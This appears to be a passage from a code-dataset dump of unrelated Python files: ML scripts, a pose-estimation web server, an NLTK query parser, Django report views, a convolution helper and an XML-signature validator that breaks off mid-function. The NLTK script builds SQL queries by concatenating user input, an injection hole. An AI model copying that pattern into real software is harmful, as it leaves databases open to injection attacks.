X[y!=2]\n y = y[y!=2]\n generator = cached_holdouts_generator(\n X, y, holdouts=example_random_holdouts, cache_dir=\"holdouts\", skip=skip)\n hyper_parameters = {\n \"epochs\": 10\n }\n\n for _, _, inner in generator(results_directory=\"results\", hyper_parameters=hyper_parameters):\n for _ in inner(results_directory=\"results\", hyper_parameters=hyper_parameters):\n pass\n\n for (training, testing), outer_key, inner in generator(results_directory=\"results\", hyper_parameters=hyper_parameters):\n with pytest.raises(ValueError):\n load_result(\"results\", outer_key, hyper_parameters)\n add_work_in_progress(\"results\", outer_key, hyper_parameters)\n for (inner_training, inner_testing), inner_key, _ in inner(results_directory=\"results\", hyper_parameters=hyper_parameters):\n store_keras_result(inner_key, **train(inner_training, inner_testing, hyper_parameters))\n with pytest.raises(ValueError):\n store_keras_result(inner_key, **train(inner_training, inner_testing, hyper_parameters))\n store_keras_result(outer_key, **train(training, testing, hyper_parameters))\n\n for (training, testing), outer_key, inner in generator(results_directory=\"results\", hyper_parameters=hyper_parameters):\n assert training is None\n assert testing is None\n assert not inner()\n load_result(\"results\", outer_key, hyper_parameters)\n\n clear_all_cache(results_directory=\"results\", cache_dir=\"holdouts\")\n","sub_path":"tests/test_keras_cache.py","file_name":"test_keras_cache.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602066665","text":"from __future__ import division\n\nimport argparse\nimport base64\nimport io\nimport json\nimport re\nimport time\n\nimport PIL\nimport torch\nimport tornado\nfrom tornado.web import 
RequestHandler\n\nimport databench\nimport openpifpaf\nimport openpifpaf.network.nets\nimport openpifpaf.transforms\n\nfrom . import __version__ as VERSION\n\n\nclass Processor(object):\n def __init__(self, args):\n # load model\n self.model, _ = openpifpaf.network.nets.factory_from_args(args)\n self.model = self.model.to(args.device)\n self.processor = openpifpaf.decoder.factory_from_args(args, self.model)\n self.device = args.device\n self.resolution = args.resolution\n\n def single_image(self, b64image):\n imgstr = re.search(r'base64,(.*)', b64image).group(1)\n image_bytes = io.BytesIO(base64.b64decode(imgstr))\n im = PIL.Image.open(image_bytes).convert('RGB')\n print('input image', im.size, self.resolution)\n\n landscape = im.size[0] > im.size[1]\n target_wh = (int(640 * self.resolution), int(480 * self.resolution))\n if not landscape:\n target_wh = (int(480 * self.resolution), int(640 * self.resolution))\n if im.size[0] != target_wh[0] or im.size[1] != target_wh[1]:\n print('!!! have to resize image to', target_wh, ' from ', im.size)\n im = im.resize(target_wh, PIL.Image.BICUBIC)\n width_height = im.size\n\n start = time.time()\n preprocess = openpifpaf.transforms.image_transform\n processed_image_cpu = preprocess(im)\n processed_image = processed_image_cpu.contiguous().to(self.device, non_blocking=True)\n print('preprocessing time', time.time() - start)\n\n all_fields = self.processor.fields(torch.unsqueeze(processed_image.float(), 0))[0]\n keypoint_sets, scores = self.processor.keypoint_sets(all_fields)\n\n # normalize scale\n keypoint_sets[:, :, 0] /= processed_image_cpu.shape[2]\n keypoint_sets[:, :, 1] /= processed_image_cpu.shape[1]\n\n return keypoint_sets, scores, width_height\n\n\nPROCESSOR_SINGLETON = None\n\n\nclass Demo(databench.Analysis):\n pass\n\n\n# pylint: disable=abstract-method\nclass PostHandler(RequestHandler):\n def set_default_headers(self):\n self.set_header('Access-Control-Allow-Origin', '*')\n self.set_header('Access-Control-Allow-Headers',\n 'Content-Type, Access-Control-Allow-Headers')\n\n def post(self): # pylint: disable=arguments-differ\n self.set_default_headers()\n\n image = self.get_argument('image', None)\n if image is None:\n image = json.loads(self.request.body).get('image', None)\n if image is None:\n self.write('no image provided')\n return\n\n keypoint_sets, scores, width_height = PROCESSOR_SINGLETON.single_image(image)\n keypoint_sets = [{\n 'coordinates': keypoints.tolist(),\n 'detection_id': i,\n 'score': score,\n 'width_height': width_height,\n } for i, (keypoints, score) in enumerate(zip(keypoint_sets, scores))]\n self.write(json.dumps(keypoint_sets))\n\n def options(self):\n self.set_default_headers()\n self.set_status(204)\n self.finish()\n\n\nasync def grep_static(url='http://127.0.0.1:5000', dest='openpifpafwebdemo/static/index.html'):\n http_client = tornado.httpclient.AsyncHTTPClient()\n response = await http_client.fetch(url)\n out = response.body.decode()\n out = out.replace('=\"/_static', '=\"_static')\n out = out.replace('href=\"/\"', 'href=\"/openpifpafwebdemo\"')\n with open(dest, 'w') as f:\n f.write(out)\n http_client.close()\n\n\ndef main():\n global PROCESSOR_SINGLETON # pylint: disable=global-statement\n\n parser = argparse.ArgumentParser()\n openpifpaf.decoder.cli(parser, force_complete_pose=False, instance_threshold=0.05)\n openpifpaf.network.nets.cli(parser)\n parser.add_argument('--disable-cuda', action='store_true',\n help='disable CUDA')\n parser.add_argument('--resolution', default=0.4, type=float)\n 
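PostHandler above accepts the image either as a form field or as a JSON body whose `image` value is a base64 data URL (single_image strips everything up to `base64,`). A minimal client sketch; the `process` route comes from the extra_routes registration in the databench.run call below, and the host/port follow the 127.0.0.1:5000 default used by grep_static, so adjust both to your deployment:

```python
import base64
import json
from urllib.request import Request, urlopen

# 'example.jpg' is a placeholder input file.
with open('example.jpg', 'rb') as f:
    b64 = base64.b64encode(f.read()).decode('ascii')

payload = json.dumps({'image': 'data:image/jpeg;base64,' + b64}).encode('utf8')
req = Request('http://127.0.0.1:5000/process', data=payload,
              headers={'Content-Type': 'application/json'})
with urlopen(req) as resp:
    detections = json.loads(resp.read().decode('utf8'))
for d in detections:
    print(d['detection_id'], d['score'], len(d['coordinates']), 'keypoints')
```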
parser.add_argument('--grep-static', default=False, action='store_true')\n parser.add_argument('--google-analytics')\n args = parser.parse_args()\n\n # add args.device\n args.device = torch.device('cpu')\n if not args.disable_cuda and torch.cuda.is_available():\n args.device = torch.device('cuda')\n\n PROCESSOR_SINGLETON = Processor(args)\n\n if args.grep_static:\n tornado.ioloop.IOLoop.current().call_later(1.0, grep_static)\n\n tornado.autoreload.watch('openpifpafwebdemo/index.html')\n tornado.autoreload.watch('openpifpafwebdemo/analysis.js')\n\n databench.run(Demo, __file__,\n info={'title': 'OpenPifPafWebDemo',\n 'google_analytics': args.google_analytics,\n 'version': VERSION,\n 'resolution': args.resolution},\n static={r'(analysis\\.js.*)': '.', r'static/(.*)': 'openpifpafwebdemo/static'},\n extra_routes=[('process', PostHandler, None)])\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"openpifpafwebdemo/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"403912575","text":"from sim_dat2 import *\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\n\n\nX_set = x1\nX_set = X_set.astype('float32')\nX_set = X_set[:, np.newaxis]\nY = Y.astype('float32')\nX_train, X_test, Y_train, Y_test = train_test_split(X_set, Y, test_size = 0.1, random_state = 256)\n\n\n\n# Fits a linear regression type model\n# will use to compare to Neural Network\nregr = LinearRegression()\nregr.fit(X_train, Y_train)\ntrain_pred = regr.predict(X_train)\ntest_pred = regr.predict(X_test)\n\n\nprint('Coefficients: ', regr.intercept_ ,regr.coef_)\nprint('Train Error: ', mean_squared_error(Y_train, train_pred))\nprint('Test Error: ', mean_squared_error(Y_test, test_pred))\n\nplt.scatter(X_test, Y_test, color='r', s=10)\nplt.plot(X_test, test_pred, 'b', linewidth=3)\nplt.show()","sub_path":"NNvLR/1_lr_var.py","file_name":"1_lr_var.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"137974540","text":"n=int(input('Enter any Positive integer'))\r\n\r\n\r\np=n-2\r\nl=1\r\nfor i in range(n):\r\n if(i==0):\r\n print(' '*p,'*')\r\n p-=1\r\n elif(i==1):\r\n print(' '*p,'* *')\r\n elif(i==n-1):\r\n print('* '*n,end='')\r\n else:\r\n p=p-1 \r\n print(' '*p,'*',' '*l,'*')\r\n l=l+2\r\n \r\n\r\n\r\n","sub_path":"python assignmentFinal/Module3/hollow_triangle.py","file_name":"hollow_triangle.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"306562526","text":"import nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tag import pos_tag\nfrom nltk.corpus import stopwords\nimport sqlite3\nimport datetime\n\nlist_verb, list_noun, list_coordinating_conjunction, list_cardinal_digit = [], [], [], []\nlist_determiner, list_existential, list_foreign_word, list_preposition = [], [], [], []\nlist_adjective, list_adjective_comparative, list_adjective_superlative, list_marker = [], [], [], []\nlist_modal, list_noun_plural, list_proper_noun_singular, list_proper_noun_plural = [], [], [], []\nlist_predeterminer, list_possessive_ending, list_personal_pronoun, list_possessive_pronoun = [], [], [], []\nlist_adverb, list_adverb_comparative, list_adverb_superlative, list_particle = [], [], 
[], []\nlist_to, list_interjection, list_verb_past, list_verb_gerund_present_participle = [], [], [], []\nlist_verb_past_participle, list_verb_singular_present, list_verb_3rd_person_singular_present, list_wh_determiner = [], [], [], []\nlist_wh_pronoun, list_possessive_wh_pronoun, list_wh_adverb = [], [], []\n\ncount = 0\n\nprint(\"Jarvis at your service sir!\")\nquery = input(\"How may I help you?\\n\")\nstopwords = set(stopwords.words(\"english\"))\n#query = query.lower()\nwords = word_tokenize(query)\n# print(words)\ntagged_query = pos_tag(words)\n# print(tagged_query)\nfor i, j in tagged_query:\n # print(i, j)\n if j == \"VB\":\n list_verb.append(i)\n print(list_verb)\n elif j == \"NN\":\n list_noun.append(i)\n elif j == \"CC\":\n list_coordinating_conjunction.append(i)\n elif j == \"CD\":\n list_cardinal_digit.append(i)\n elif j == \"DT\":\n list_determiner.append(i)\n elif j == \"EX\":\n list_existential.append(i)\n elif j == \"FW\":\n list_foreign_word.append(i)\n elif j == \"IN\":\n list_preposition.append(i)\n elif j == \"JJ\":\n list_adjective.append(i)\n elif j == \"JJR\":\n list_adjective_comparative.append(i)\n elif j == \"JJS\":\n list_adjective_superlative.append(i)\n elif j == \"LS\":\n list_marker.append(i)\n elif j == \"MD\":\n list_modal.append(i)\n elif j == \"NNS\":\n list_noun_plural.append(i)\n elif j == \"NNP\":\n list_proper_noun_singular.append(i)\n elif j == \"NNPS\":\n list_proper_noun_plural.append(i)\n elif j == \"PDT\":\n list_predeterminer.append(i)\n elif j == \"POS\":\n list_possessive_ending.append(i)\n elif j == \"PRP\":\n list_personal_pronoun.append(i)\n elif j == \"PRP$\":\n list_possessive_pronoun.append(i)\n elif j == \"RB\":\n list_adverb.append(i)\n elif j == \"RBR\":\n list_adverb_comparative.append(i)\n elif j == \"RBS\":\n list_adverb_superlative.append(i)\n elif j == \"RP\":\n list_particle.append(i)\n elif j == \"TO\":\n list_to.append(i)\n elif j == \"UH\":\n list_interjection.append(i)\n elif j == \"VBD\":\n list_verb_past.append(i)\n elif j == \"VBG\":\n list_verb_gerund_present_participle.append(i)\n elif j == \"VBN\":\n list_verb_past_participle.append(i)\n elif j == \"VBP\":\n list_verb_singular_present.append(i)\n elif j == \"VBZ\":\n list_verb_3rd_person_singular_present.append(i)\n elif j == \"WDT\":\n list_wh_determiner.append(i)\n elif j == \"WP\":\n list_wh_pronoun.append(i)\n elif j == \"WP$\":\n list_possessive_wh_pronoun.append(i)\n elif j == \"WRB\":\n list_wh_adverb.append(i)\n else:\n print(\"Didn't understand the word '\" + i + \"' please train me! 
\")\n\nnow = datetime.datetime.now()\n\n\ndef create_file():\n with open(\"C:/Users/shubu/PycharmProjects/nltk_project/files/\" + now.strftime('%d-%b-%Y %H-%M %p') + \".txt\",\n \"w+\")as output_file:\n output_file.write(\"q) \" + query) # Write empty string\n\n\ncreate_file()\n\n# PRINTING PROCESS STARTS :\n\n# print(\"List of nouns:\")\n# print(list_noun)\n# print(\"List of Verbs:\")\n# print(list_verb)\n# print(\"Coordinating Conjunction:\")\n# print(list_coordinating_conjunction)\n# print(\"Cardinal digits:\")\n# print(list_cardinal_digit)\n# print(\"Determiner:\")\n# print(list_determiner)\n# print(\"Existential:\")\n# print(list_existential)\n# print(\"Foreign Word:\")\n# print(list_foreign_word)\n# print(\"Preposition:\")\n# print(list_preposition)\n# print(\"adjective:\")\n# print(list_adjective)\n# print(\"adjective comparative:\")\n# print(list_adverb_comparative)\n# print(\"adjective superlative:\")\n# print(list_adjective_superlative)\n# print(\"list marker:\")\n# print(list_marker)\n# print(\"Modal:\")\n# print(list_modal)\n# print(\"Plural noun:\")\n# print(list_noun_plural)\n# print(\"Singular Proper noun:\")\n# print(list_proper_noun_singular)\n# print(\"Plural Proper noun:\")\n# print(list_proper_noun_plural)\n# print(\"Predeterminer:\")\n# print(list_predeterminer)\n# print(\"Possessive Ending:\")\n# print(list_possessive_ending)\n# print(\"personal pronoun:\")\n# print(list_personal_pronoun)\n# print(\"possessive pronoun:\")\n# print(list_possessive_pronoun)\n# print(\"Adverb:\")\n# print(list_adverb)\n# print(\"adverb comparative:\")\n# print(list_adverb_comparative)\n# print(\"adverb superlative:\")\n# print(list_adverb_superlative)\n# print(\"particle:\")\n# print(list_particle)\n# print(\"To:\")\n# print(list_to)\n# print(\"Interjection:\")\n# print(list_interjection)\n# print(\"Past tense Verb:\")\n# print(list_verb_past)\n# print(\"Verb Gerund/Present Participle:\")\n# print(list_verb_gerund_present_participle)\n# print(\"Verb Past Participle:\")\n# print(list_verb_past_participle)\n# print(\"Singular Present Verb:\")\n# print(list_verb_singular_present)\n# print(\"3rd person singular present Verb:\")\n# print(list_verb_3rd_person_singular_present)\n# print(\"WH-Determiner:\")\n# print(list_wh_determiner)\n# print(\"WH-Pronoun:\")\n# print(list_wh_pronoun)\n# print(\"Possessive WH-Pronoun\")\n# print(list_possessive_wh_pronoun)\n# print(\"WH-Adverb\")\n# print(list_wh_adverb)\n\n# -----------------------------------------------------------------------------------------------------------------------------------\n\n# dict_verb, dict_noun, dict_coordinating_conjunction, dict_cardinal_digit = {}, {}, {}, {}\n# dict_determiner, dict_existential, dict_foreign_word, dict_preposition = {}, {}, {}, {}\n# dict_adjective, dict_adjective_comparative, dict_adjective_superlative, dict_marker = {}, {}, {}, {}\n# dict_modal, dict_noun_plural, dict_proper_noun_singular, dict_proper_noun_plural = {}, {}, {}, {}\n# dict_predeterminer, dict_possessive_ending, dict_personal_pronoun, dict_possessive_pronoun = {}, {}, {}, {}\n# dict_adverb, dict_adverb_comparative, dict_adverb_superlative, dict_particle = {}, {}, {}, {}\n# dict_to, dict_interjection, dict_verb_past, dict_verb_gerund_present_participle = {}, {}, {}, {}\n# dict_verb_past_participle, dict_verb_singular_present, dict_verb_3rd_person_singular_present, dict_wh_determiner = {}, {}, {}, {}\n# dict_wh_pronoun, dict_possessive_wh_pronoun, dict_wh_adverb = {}, {}, {}\n\n# 
------------------------------------------------------------------------------------------------------------------------------------\n\npos_dict = {\"noun\": list_noun, \"verb\": list_verb, \"coordinating_conjunction\": list_coordinating_conjunction,\n \"cardinal_digit\": list_cardinal_digit, \"determiner\": list_determiner, \"existential\": list_existential,\n \"foreign_word\": list_foreign_word, \"preposition\": list_preposition, \"adjective\": list_adjective,\n \"adjective_comparative\": list_adjective_comparative, \"adjective_superlative\": list_adjective_superlative,\n \"marker\": list_marker, \"modal\": list_modal, \"noun_plural\": list_noun_plural,\n \"proper_noun_singular\": list_proper_noun_singular, \"proper_noun_plural\": list_proper_noun_plural,\n \"predeterminer\": list_predeterminer, \"possessive_ending\": list_possessive_ending,\n \"personal_pronoun\": list_personal_pronoun, \"possessive_pronoun\": list_possessive_pronoun, \"adverb\": list_adverb,\n \"adverb_comparative\": list_adverb_comparative, \"adverb_superlative\": list_adverb_superlative,\n \"particle\": list_particle, \"to\": list_to, \"interjection\": list_interjection, \"verb_past\": list_verb_past,\n \"verb_gerund_present_participle\": list_verb_gerund_present_participle,\n \"verb_past_participle\": list_verb_past_participle, \"verb_singular_present\": list_verb_singular_present,\n \"verb_3rd_person_singular_present\": list_verb_3rd_person_singular_present, \"wh_determiner\": list_wh_determiner,\n \"wh_pronoun\": list_wh_pronoun, \"possessive_wh_pronoun\": list_possessive_wh_pronoun, \"wh_adverb\": list_wh_adverb}\nprint(\"Dictionary of the parts of speech:\")\nprint(pos_dict)\n\nconn = sqlite3.connect('test.db')\nprint(\"Opened database successfully\")\n\nstr1 = \"\"\noutput_file = open(\"C:/Users/shubu/PycharmProjects/nltk_project/files/\" + now.strftime('%d-%b-%Y %H-%M %p') + \".txt\",\n \"a+\")\n\nfor i in list_preposition:\n if pos_dict['preposition'][count] in (\"between\", \"from\") or pos_dict['noun'][count] == \"range\":\n cursor = conn.execute(\n \"SELECT * from COMPANY where \" + pos_dict['noun'][count - 1] + \" > \" + pos_dict['cardinal_digit'][0] + \" and \" +\n pos_dict['noun'][count - 1] + \" < \" + pos_dict['cardinal_digit'][1])\n for row in cursor:\n print(row)\n str1 = row\n output_file.write(\"\\n Solution: \" + str(str1))\n count = count + 1\n\n\nprint(\"Operation done successfully\")\nconn.close()\n","sub_path":"practice_nltk.py","file_name":"practice_nltk.py","file_ext":"py","file_size_in_byte":9265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
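The long if/elif chain in the record above maps each Penn Treebank tag to its own list by hand. A sketch of the same bucketing with a defaultdict keyed by tag, which also yields the final parts-of-speech dictionary directly:

```python
from collections import defaultdict
from nltk import pos_tag, word_tokenize

def bucket_by_tag(sentence):
    """Group tokens by their Penn Treebank tag, e.g. buckets['NN'], buckets['VB']."""
    buckets = defaultdict(list)
    for word, tag in pos_tag(word_tokenize(sentence)):
        buckets[tag].append(word)
    return buckets

# buckets = bucket_by_tag("show employees with salary between 20000 and 40000")
# buckets['IN'] -> prepositions, buckets['CD'] -> cardinal digits, etc.
```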
+{"seq_id":"322200043","text":"from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.contrib import messages\t\nfrom django.urls import reverse_lazy\nfrom .models import Suspicious_report, Report_Information\nfrom .forms import UpdateReportInfoForm\nfrom django.shortcuts import get_object_or_404, redirect,render\nfrom django.db.models import Q\nfrom datetime import datetime, timedelta\nfrom django.contrib.auth.decorators import login_required\n#from suspicious_report.models import Suspicious_report\n\n@login_required(login_url=reverse_lazy(\"accounts:login\"))\ndef list_suspicious_reports(request, *args, **kwargs):\n\n\t#reports = Suspicious_report.objects.filter(date=datetime.now().date()).order_by(\"-time\",\"-date\")\n\treports = Suspicious_report.objects.all().order_by(\"-date\", \"-time\")\n\tquery \t\t\t= request.GET.get(\"q\")\t\n\tif query:\n\t\treports = reports.filter(\n\t\t\tQ(is_active=True) &\n\t\t\t(Q(user__full_name__icontains=query)|\n\t\t\tQ(information__icontains=query)|\n\t\t\tQ(crime_type__icontains=query)|\n\t\t\tQ(date__startswith=query)|\n\t\t\tQ(time__regex=query))\n\t\t\t)\n\n\n\n\n\n\tif request.method == 'POST':\n\t\tif 'responded' in request.POST:\n\t\t\tw = request.POST.get('w')\n\t\t\tSuspicious_report.objects.filter(pk__iexact=w).update(action=\"RESPONDED\")\n\t\telif 'pending' in request.POST:\n\t\t\tw = request.POST.get('w')\n\t\t\tSuspicious_report.objects.filter(pk__iexact=w).update(action=\"PENDING\")\n\t\telif 'false' in request.POST:\n\t\t\tw = request.POST.get('w')\n\t\t\tSuspicious_report.objects.filter(pk__iexact=w).update(action=\"FALSE\")\n\n\t\telse:\n\t\t\tprint('None')\n\n\tpaginator \t\t\t= Paginator(reports, 10)\n\tpage \t\t\t\t= request.GET.get('page')\n\tqueryset_page \t\t= paginator.get_page(page)\n\n\ttry:\n\t \tqueryset_page \t= paginator.page(page)\n\texcept PageNotAnInteger:\n\t \tqueryset_page \t= paginator.page(1)\n\texcept EmptyPage:\n\t \tqueryset_page \t= paginator.page(paginator.num_pages)\n\n\tcontext = {\n\t\t'page_obj': queryset_page,\n\n\t}\n\treturn render(request, 'suspicious_reports/listsuspiciousreport.html', context)\n\n\n\n\n@login_required(login_url=reverse_lazy(\"accounts:login\"))\ndef detail_suspicious_reports(request, pk=None, *args, **kwargs):\n\n\treports\t= get_object_or_404(Suspicious_report, pk=pk)\n\trep_info_instance = get_object_or_404(Report_Information, pk=reports.report_info.pk)\n\tform = UpdateReportInfoForm(data=request.POST or None, instance=rep_info_instance)\n\tif request.method == 'POST':\n\t\tform = UpdateReportInfoForm(data=request.POST or None, instance=rep_info_instance)\n\t\tif 'send' in request.POST:\n\t\t\tsend_feedback \t= request.POST.get('feedback')\n\t\t\tfeedback_id\t\t= request.POST.get('id')\n\t\t\tfeed \t\t\t= Suspicious_report.objects.get(pk=feedback_id)\n\t\t\tfeed.feedback = send_feedback\n\t\t\tfeed.save()\n\t\t\tmessages.success(request,\"Feedback Sent!\")\n\t\t\treturn redirect(reverse_lazy(\"suspicious_reports:detail-reports\", kwargs={'pk':feedback_id}))\n\t\t\t\n\t\telif 'respond' in request.POST: \n\t\t\tfeedback_id\t\t= request.POST.get('id')\n\t\t\tif form.is_valid():\n\t\t\t\tform.save()\n\t\t\t\treturn redirect(reverse_lazy(\"suspicious_reports:detail-reports\", kwargs={'pk':feedback_id}))\n\n\tcontext = {\n\t'reports': reports,\n\t'form':form\n\t\n\t}\t\t\t\n\n\treturn render(request, \"suspicious_reports/detailsuspiciousreport.html\", context)\n\n\n","sub_path":"Capstone/suspicious_report/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"477758989","text":"\"\"\"\nConvolution functions to apply on images\n\"\"\"\n\n# main imports\nimport numpy as np\n\n\ndef convolution2D(image, kernel, kernel_size=(5, 5), stride=1):\n \"\"\"Apply 2D convolution on image using specific kernel from `ipfml.filters.kernels`\n\n Args:\n image: 2D image to apply convolution on\n kernel: specific kernel from `ipfml.filters.kernels` to use\n kernel_size: window size to use (default (5, 5))\n stride: step between two successive windows (default 1)\n\n Returns:\n 2D numpy array obtained from image using kernel\n\n Example:\n\n >>> from ipfml.filters.convolution import convolution2D\n >>> from ipfml.filters.kernels import plane_mean\n >>> import numpy as np\n >>> image = np.arange(81).reshape([9, 9])\n >>> convolved_image = convolution2D(image, plane_mean, (3, 3)) \n >>> convolved_image.shape\n (7, 7)\n \"\"\"\n\n img = np.array(image)\n\n width, height = img.shape\n\n kernel_width, kernel_height = kernel_size\n\n if kernel_width % 2 == 0 or kernel_height % 2 == 0:\n raise ValueError(\"Invalid kernel size, need to be of odd size\")\n\n padding_height = (kernel_height - 1) / 2\n padding_width = (kernel_width - 1) / 2\n\n img_diff = []\n for i in range(width):\n\n if i >= padding_width and i < (width -\n padding_width) and i % stride == 0:\n\n row_diff = []\n\n for j in range(height):\n\n if j >= padding_height and j < (\n height - padding_height) and j % stride == 0:\n\n # pixel in the center of kernel window size, need to extract window from img\n window = img[int(i - padding_width):int(i + padding_width +\n 1),\n int(j -\n padding_height):int(j + padding_height +\n 1)]\n\n diff = kernel(window)\n row_diff.append(diff)\n\n img_diff.append(row_diff)\n\n return np.array(img_diff)\n","sub_path":"ipfml/filters/convolution.py","file_name":"convolution.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
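convolution2D above visits each window with nested Python loops so that an arbitrary `kernel` function can be applied. The window extraction itself can be delegated to numpy.lib.stride_tricks.sliding_window_view (NumPy >= 1.20); a sketch of the stride=1 case, not part of ipfml:

```python
import numpy as np
from numpy.lib.stride_tricks import sliding_window_view

def convolution2D_vectorized(image, kernel, kernel_size=(5, 5)):
    """Equivalent to convolution2D with stride=1: apply `kernel` to every
    fully-contained window. `kernel` must accept a 2D window, e.g. np.mean."""
    kh, kw = kernel_size
    if kh % 2 == 0 or kw % 2 == 0:
        raise ValueError("Invalid kernel size, need to be of odd size")
    # Shape: (H - kh + 1, W - kw + 1, kh, kw), no manual index arithmetic.
    windows = sliding_window_view(np.asarray(image), (kh, kw))
    out = np.empty(windows.shape[:2])
    for i in range(windows.shape[0]):
        for j in range(windows.shape[1]):
            out[i, j] = kernel(windows[i, j])
    return out

# image = np.arange(81).reshape(9, 9)
# convolution2D_vectorized(image, np.mean, (3, 3)).shape  # (7, 7)
```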
+{"seq_id":"635664257","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n############### file info ######################################################\n#\n#\n#\n#\n#\n#\n################################################################################\n\n\nimport xbox\nif __debug__:pass\nelse:\n\timport RPi.GPIO as pi\n\n\nPWM_duty = 50 #%\n\n#Servo Left (placeholders: set to the actual GPIO pin numbers)\nMS1_LeftPin = None\nMS2_LeftPin = None\nMS3_LeftPin = None\nDir_LeftPin = None\nStep_LeftPin = None\nEnable_LeftPin = None\n\n#Servo Right defs (placeholders: set to the actual GPIO pin numbers)\nMS1_RightPin = None\nMS2_RightPin = None\nMS3_RightPin = None\nDir_RightPin = None\nStep_RightPin = None\nEnable_RightPin = None\n\n#def controls\njoystick = xbox.Joystick()\nXstick = joystick.leftX()\nYstick = joystick.leftY()\nu = ((100-abs(Xstick))*Ystick/100+Ystick)\nv = ((100-abs(Ystick))*Xstick/100+Xstick)\nrightVector = (u+v)/2\nleftVector = (u-v)/2\n\n","sub_path":"Rover1.py","file_name":"Rover1.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"102900840","text":"\"\"\"\nXml-signature generation and verifying functions.\n\nUsage:\nTo verify signature:\n>>> result = validate(xml_string)\n>>> if result:\n print('Valid')\n else:\n print('Failed to verify')\n\nTo sign xml message:\n>>> signed_xml = sign(xml_string,\"private_key.pem\",\"certificate.x509\")\n\nXml signing. 
http://www.w3.org/TR/xmldsig-core/\nNeeded external libraries:\n - LXML\n - PyCrypto\n - PyOpenSSL >0.12\n\"\"\"\nfrom io import StringIO, BytesIO\nimport base64\nimport hashlib\nimport logging\n\nimport Crypto.PublicKey.RSA as RSA\nimport Crypto.Hash.SHA as SHA\nfrom Crypto.Signature import PKCS1_v1_5\nfrom lxml.builder import ElementMaker\nfrom lxml import etree\nimport OpenSSL\n\ntry:\n from bankws.certificate import check_revocation_status\nexcept ImportError:\n from certificate import check_revocation_status\n# Generate needed xml elements.\nE = ElementMaker(namespace=\"http://www.w3.org/2000/09/xmldsig#\",\n nsmap={None: \"http://www.w3.org/2000/09/xmldsig#\"})\n\nDOC = E.Signature\nSIGNEDINFO = E.SignedInfo\nCANONICALIZATIONMETHOD = E.CanonicalizationMethod\nSIGNATUREMETHOD = E.SignatureMethod\nREFERENCE = E.Reference\nTRANSFORMS = E.Transforms\nTRANSFORM = E.Transform\nDIGESTMETHOD = E.DigestMethod\nDIGESTVALUE = E.DigestValue\nSIGNATUREVALUE = E.SignatureValue\nKEYINFO = E.KeyInfo\nX509DATA = E.X509Data\nX509CERTIFICATE = E.X509Certificate\n\n\ndef validate(xml_string):\n \"\"\"\n Validates given xml string\n\n @type xml_string: string\n @param xml_string: xml string to verify\n @rtype: boolean\n @return: Result of verification.\n \"\"\"\n log = logging.getLogger(\"bankws\")\n try:\n tree = etree.fromstring(xml_string)\n except etree.XMLSyntaxError:\n log.error(\"Unable to parse xml-data.\")\n return False\n\n result = tree.xpath(\"//ds:Signature\",\n namespaces={'ds': \"http://www.w3.org/2000/09/xmldsig#\"})\n\n signature = result[0] if len(result) > 0 else None\n if signature is None:\n log.error(\"Didn't find signature field\")\n return False\n\n digestvalues = {}\n signed_info = None\n signaturevalue = None\n\n for element in signature.iter():\n if element.tag == \"{http://www.w3.org/2000/09/xmldsig#}DigestValue\":\n key = element.getparent().get('URI')\n digestvalues[key] = element.text\n if element.tag == \"{http://www.w3.org/2000/09/xmldsig#}SignedInfo\":\n signed_info = element\n if element.tag == \"{http://www.w3.org/2000/09/xmldsig#}SignatureValue\":\n log.debug(\"{0}: {1}\".format(element.tag, element.text))\n signaturevalue = element.text\n\n # Get certificate from xml string\n certificate = get_certificate(xml_string)\n\n if certificate is None:\n log.error('Signed message but certificate is missing.')\n return False\n\n if signaturevalue is None:\n log.error(\"SignatureValue field is missing.\")\n return False\n\n if signed_info is None:\n log.error(\"SignedInfo is missing.\")\n return False\n\n # Values are base64 encoded so decode them\n certificate_data = base64.b64decode(bytes(certificate, 'utf-8'))\n signaturevalue = base64.b64decode(bytes(signaturevalue, 'utf-8'))\n\n algorithm = signed_info.xpath(\"//ds:CanonicalizationMethod[@Algorithm]\",\n namespaces={'ds': \"http://www.w3.org/2000/09/xmldsig#\"})\n\n if len(algorithm) > 0:\n comments = \"#WithComments\" in algorithm[0].get(\"Algorithm\")\n exclusive = \"xml-exc-c14n#\" in algorithm[0].get(\"Algorithm\")\n\n message = etree.tostring(signed_info)\n # Canonicalize message before calculations.\n canonicalizated_info = canonicalizate_message(str(message, 'utf-8'),\n exclusive_=exclusive,\n comments_=comments)\n\n #Calculate digests.\n for key, value in digestvalues.items():\n digest_value = \"\"\n if key == \"\": # Whole document is used\n tree.remove(signature)\n xmlstring = str(etree.tostring(tree), 'utf-8')\n digest = calculate_digest(xmlstring, exclusive, comments)\n digest_value = 
